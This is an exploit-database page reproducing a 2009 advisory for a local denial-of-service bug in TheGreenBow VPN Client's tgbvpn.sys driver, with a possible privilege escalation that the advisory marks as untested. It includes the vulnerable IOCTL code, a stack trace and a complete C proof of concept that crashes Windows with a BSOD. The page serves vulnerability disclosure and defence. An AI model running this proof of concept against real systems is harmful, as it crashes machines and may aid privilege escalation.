header-logo
Suggest Exploit
vendor:
VPN Client
by:
Giuseppe 'Evilcry' Bonfa'
7,2
CVSS
HIGH
Local Denial of Service (BSOD) and Local Privilege Escalation
119
CWE
Product Name: VPN Client
Affected Version From: TheGreenBow VPN Client 4.61.003
Affected Version To: TheGreenBow VPN Client 4.61.003
Patch Exists: NO
Related CWE: N/A
CPE: a:thegreenbow:vpn_client
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

TheGreenBow VPN Client 4.61.003 Local Denial of Service (BSOD) and Local Privilege Escalation

TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input (IOCTL) and this lead to a Driver Collapse that propagates on the system with a BSOD, and potential risk of Privilege Escalation.

Mitigation:

Sanitize user supplied input (IOCTL)
Source

Exploit-DB raw data:

Author: Giuseppe 'Evilcry' Bonfa'
E-Mail: evilcry {AT} GMAIL {DOT} COM
Website: http://evilcry.netsons.org
             http://evilcodecave.blogspot.com
             http://evilcodecave.wordpress.com
             http://evilfingers.com
             http://malwareAnalytics.com [under construction]

Release Date: 15/08/2009

+-------------------------------------------------+
Product: TheGreenBow VPN Client 4.61.003  (other versions could be affected)
Affected Component: tgbvpn.sys
Category: Local Denial of Service (BSOD)
         (untested) Local Privilege Escalation

+-------------------------------------------------+



--------------------------[Details]--------------->

TheGreenBow's tgbvpn.sys Driver does not sanitize user supplied input
(IOCTL)
and this lead to a Driver Collapse that propagates on the system with a
BSOD,
and potential risk of Privilege Escalation.

Affected IOCTL is 0x80000034

Transfer Type: METHOD_BUFFERED

STACK_TEXT:
WARNING: Stack unwind information not available. Following frames may be
wrong.
ef1cabf4 841d36a8 ef1cac58 841d36a8 f42dd895 tgbvpn+0x9f51
00000000 00000000 00000000 00000000 00000000 0x841d36a8


+--------------------------------------------------------------------------------------------+
/* tgbvpn.sys KERNEL_MODE_EXCEPTION_NOT_HANDLED - DoS PoC
 *
 * Author: Giuseppe 'Evilcry' Bonfa'
 * E-Mail: evilcry {AT} gmail. {DOT} com
 * Website: http://evilcry.netsons.org
 * http://evilcodecave.blogspot.com
 * http://evilcodecave.wordpress.com
 * http://evilfingers.com
 * http://malwareAnalytics.com [under construction]
 */

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

int main(void)
{
   HANDLE hDevice;
   DWORD Junk;



   system("cls");
   printf("\n .:: TheGreenBow DoS Proof of Concept ::.\n");

   hDevice = CreateFileA("\\\\.\\tgbvpn",
                       0,
                       FILE_SHARE_READ | FILE_SHARE_WRITE,
                       NULL,
                       OPEN_EXISTING,
                       0,
                       NULL);

   if (hDevice == INVALID_HANDLE_VALUE)
   {
       printf("\n Unable to Device Driver\n");
       return EXIT_FAILURE;
   }

   DeviceIoControl(hDevice, 0x80000034,(LPVOID) 0x80000001, 0, (LPVOID)
0x80000002, 0, &Junk, (LPOVERLAPPED)NULL);


   return EXIT_SUCCESS;
}

+--------------------------------------------------------------------------------------------+

# milw0rm.com [2009-08-18]

Navigation

Suggest Exploit

Services By CQR